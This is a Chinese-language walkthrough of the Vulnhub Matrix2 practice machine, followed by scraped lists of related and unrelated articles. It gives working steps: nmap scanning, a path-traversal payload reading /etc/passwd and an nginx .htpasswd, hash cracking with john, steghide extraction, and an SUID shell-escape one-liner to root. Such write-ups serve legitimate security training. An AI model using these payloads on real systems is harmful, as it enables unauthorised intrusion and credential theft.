Vulnhub靶机实战——Matrix2
Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova
环境: VMware 15虚拟机软件
Matrix2靶机IP地址: 192.168.220.159
Kali的IP地址: 192.168.220.155
Matrix2靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155
ip addr
使用nmap
扫描192.168.220.0网段存活的主机,发现Matrix2靶机的IP地址为:192.168.220.159
nmap -sP -T4 192.168.220.0/24 -oN nmap220.sP
使用nmap全面扫描Matrix2靶机并查看已开放的端口,发现已开放80、1337、12320、12321、12322
端口
nmap -A -T4 -p- 192.168.220.159 -oN nmap159.A
分别打开相关端口查看页面
http://192.168.220.159/
https://192.168.220.159:1337/
https://192.168.220.159:12320/
https://192.168.220.159:12321/
https://192.168.220.159:12322/
在12322端口下,发现一个file_view.php
文件,但在robots.txt
文件发现禁用了file_view.php文件,怀疑存在任意文件包含漏洞
https://192.168.220.159:12322/robots.txt
https://192.168.220.159:12322/file_view.php
使用BurpSuite
抓取数据包,使用POST
传参,发现可以包含任意文件,查看/etc/passwd
文件
https://192.168.220.159:12322/file_view.php
file=../../../../../../../../../etc/passwd
网站是使用nginx搭建的,查看nginx的配置文件,发现了一个p4ss
文件夹比较可疑
file=../../../../../../../../../etc/nginx/sites-available/default
auth_basic_user_file /var/www/p4ss/.htpasswd;
打开p4ss文件夹下的.htpasswd
文件发现用户Tr1n17y
及加密后的密码
Tr1n17y:$apr1$7tu4e5pd$hwluCxFYqn/IHVFcQ2wER0
使用john工具爆破,得到密码admin
john hash.txt
Tr1n17y:admin
打开端口1337的网页登录用户,并查看源码发现隐藏了一张图片h1dd3n.jpg
https://192.168.220.159:1337/
打开图片并保存到本地
https://192.168.220.159:1337/h1dd3n.jpg
h1dd3n.jpg
图片使用了隐写,使用steghide
工具将隐写的文本导出,密码是:n30
steghide --extract -sf h1dd3n.jpg
P4$$w0rd
打开12320端口的靶机控制台,使用n30
用户及密码登录
https://192.168.220.159:12320/
n30/ P4$$w0rd
查看具有suid权限的命令,发现morpheus具体suid权限,可以借此提权
find / -perm -u=s -type f 2>/dev/null
使用以下命令提到root权限,并找到隐藏的flag
morpheus 'BEGIN {system("/bin/sh")}'
Vulnhub靶机实战——Matrix2相关推荐
- 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...
- Vulnhub靶机实战——DC-8
靶机DC-8下载地址: https://download.vulnhub.com/dc/DC-8.zip 环境:VMware 15虚拟机软件 DC-8靶机IP地址:192.168.220.156 Ka ...
- Vulnhub靶机实战——DC-5
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kal ...
- 挑战全网最详细靶机教程——vulnhub靶机实战 lampiao【适合刚接触的新人学习】
靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:中等 工具:kalilinux: 一个灵活的脑子 : 一双手 目标:得到root权限&am ...
- 挑战全网最详细靶机教程——vulnhub靶机实战vulnhub Tr0ll: 1【适合刚接触的新人学习】
靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 靶机难度:简单 靶机发布日期:2014年8月14日 靶机描述:Tr0ll的灵感来自OSCP实验室中不断摇 ...
- Vulnhub靶机实战——Matrix3
下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192 ...
- Vulnhub靶机实战——DC-3
靶机DC-3下载地址:https : //download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https : //download.vulnhub.co ...
- DC-5 vulnhub靶机实战
首先是使用virtualbox安装,这里不推荐vmware,会出很多问题. nmap扫一下子网,看靶机的ip地址: 发现ip是192.168.240.137,开放了80和111端口. 给了提示是个文件 ...
- Vulnhub靶机实战-Forensics
声明 好好学习,天天向上 搭建 vmware打开,网络和攻击机一样,桥接模式 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.152 -p 1 ...
最新文章
- MySQL开启远程连接权限
- 解决报错:gpg: keyserver receive failed: No dirmngr
- jedis操作redis(二)
- html的canvas标签用法,html5中关于canvas标签用法(绘图)
- nrf52840 gpiote如何配置中断输入_西门子S7-200 SMART PID回路控制,配置PID向导,查看项目组件...
- 前向传播算法和反向传播算法
- K-L变换原理、图像压缩与人脸识别实战(附matlab代码)
- 实战tkinter图形界面开发_八款常用的 Python GUI 开发框架推荐
- Windows CE如何根据文件名获取其对应文件图标icon
- 怎么安装64位JAVA,大师来详解
- 基于C++11的高精度多级时间轮定时器
- 手机屏幕怎么计算机,怎样把手机屏幕投到电脑
- MapReduce计算PMI
- 微信小程序点击按钮弹出弹窗_微信小程序带图片弹窗简单实现
- PyTorch学习笔记(20) ——激活函数
- 灵狐插件与IDEA的集成
- 紫光旗下企业正和美光科技谈判存储技术授权及设立合资公司
- 文科生能学好数据分析吗
- ios传智播客_如何在iOS中创建播客播放列表
- 张一鸣带领5万人,做出多款头部产品的秘密是什么?
热门文章
- logging多进程报错:PermissionError: [WinError 32] 另一个程序正在使用此文件,进程无法访问
- 计算机不断开机,电脑开机不停自检,没完没了,好心人帮忙!
- javaweb基于JSP+Servlet房地产客户关系管理系统(CRM) 大作业 课程设计 毕业设计
- 【GO】GO Testing源码学习
- Proxifier v4* 配置文件路径
- mtk驱动camera的调试总结1--原理
- 在网站添加客服QQ,打开临时会话框(不用加为好友)
- 小米活塞耳机的背后——1MORE
- 亚马逊中国站通过ASIN获取商品信息
- 李宏毅DLHLP.20.Non-Autoregressive Generation